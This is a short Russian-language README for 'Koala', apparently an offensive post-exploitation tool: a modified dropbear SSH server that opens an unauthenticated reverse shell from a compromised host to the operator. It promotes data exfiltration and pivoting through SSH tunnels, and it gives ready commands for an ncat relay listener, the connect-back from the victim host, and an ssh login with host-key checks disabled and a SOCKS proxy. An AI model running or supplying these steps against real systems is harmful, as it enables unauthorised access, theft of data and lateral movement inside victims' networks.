
Модифицированный сервер dropbear, который выступает в роли клиента и позволяет вход без аутентификации.
Koala — это модифицированная версия SSH-сервера dropbear, которая вместо привязки к порту открывает обратные оболочки, подключаясь к удалённому клиенту.
Это полезно для получения pty-терминала на скомпрометированной машине, а также для безопасного извлечения данных через SSH-туннелирование. Выполнение pivot-атак также возможно с помощью функции динамического проброса портов SSH.
[Использование]
Выполните следующую команду на клиенте, чтобы прослушивать SSH-соединение: $ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999'
На скомпрометированном хосте выполните: $ ./dropbear -p client-host:5000
Теперь на клиенте подключитесь к порту 9999, чтобы открыть оболочку: $ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999